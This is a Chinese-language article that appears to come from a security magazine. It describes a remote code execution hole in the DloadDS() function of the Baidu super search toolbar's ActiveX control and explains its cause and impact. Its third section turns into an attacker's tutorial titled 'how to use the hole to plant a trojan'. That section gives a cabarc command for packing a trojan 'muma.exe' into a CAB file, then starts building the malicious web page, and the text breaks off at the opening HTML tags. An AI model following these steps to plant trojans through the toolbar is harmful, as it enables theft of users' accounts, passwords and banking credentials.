别用百度超级搜霸漏洞黑我
网络安全
最近百度超级搜霸被曝其中的一个ActiveX控件中存在远程代码执行漏洞,利用该漏洞,各类恶意代码就可以在用户毫无察觉的情况下“暗度陈仓”,入侵我们的系统进而安装木马以及间谍程序盗取各类账号和密码。
一、漏洞形成原因
百度搜霸是一款基于ActiveX控件的浏览器工具栏,提供百度公司的各种服务。最近曝出的属于远程代码执行漏洞,如果一个安装了百度超级搜霸的用户访问了存在恶意代码的网站,则恶意脚本就可以在远程系统中执行任意的操作命令。
工具条控件安装后默认路径为C:\Program Files\baidu\bar\下,漏洞存在于由ActiveX控件“BaiduBar.dll”导出的“DloadDS()”函数中。
如果把其控件参数中bstrUrl设置成某个服务器上的CAB文件,DloadDS()函数会尝试下载这个文件到Temp目录并解压,然后执行其中的控件参数中bstrName命名的文件,此时控件参数lpCommandLine指向“C:\DOCUME~1\administrator\LOCALS~1\Temp\calc.exe”。
由于之前没有任何有效的检查措施,因此黑客可构造包含木马或者间谍程序的CAB文件,然后用DloadDS()函数下载并运行它。
二、漏洞的危害有多大
百度超级搜霸有这样一个能执行任意代码的漏洞,就相当于给每台安装了此工具条的电脑用户留了一个完美的后门。
目前安装有百度超级搜霸的朋友也比较多,所以当这个工具条的控件漏洞被黑客利用后,黑客就可以轻松地将病毒木马程序种植到用户的电脑中并激活运行。恶意代码的内容不同,造成的危害也不同,轻则使电脑系统瘫痪,重则盗取用户的游戏账号及装备、网络银行账号密码等,给用户造成巨大的经济损失。
小提示:百度超级搜霸控制漏洞的危害程度判断是参照标准的高危害漏洞(腾讯QQ漏洞)和标准的中等危害漏洞(卡巴斯基漏洞)。
三、如何利用漏洞种马
要利用该漏洞,需要用到CABARC.EXE(CAB文件封装器),它需要在MSDOS模式下运行。
小知识:CAB文件是什么?在微软的程序发展中,压缩文件是个包括很多文件的单一文件。使用的时候,先对压缩文件进行解压缩,解压缩的文件就拷贝在一个适当的位置,压缩文件的后缀通常为“*.cab”。
第一步:由于该漏洞最终的目的是下载设置的木马程序,除了事先配置好一个木马服务端程序外,我们还需要利用CAB封装器将这个木马封装起来。我们先将CAB文件封装器“CABARC.EXE”及配置好的木马文件“muma.exe”都放在D盘根目录下,然后打开“命令提示符”窗口,进入到D盘盘符下,运行命令如下:
cabarc n calc.cab muma.exe
calc.cab是封装后的文件,muma.exe则是需要封装的文件,封装成功会提示“Completed successfully”(顺利完成)(图1)。

第二步:在D盘根目录下新建一个文本文件或记事本文件,输入下面的代码:
<html>
<head>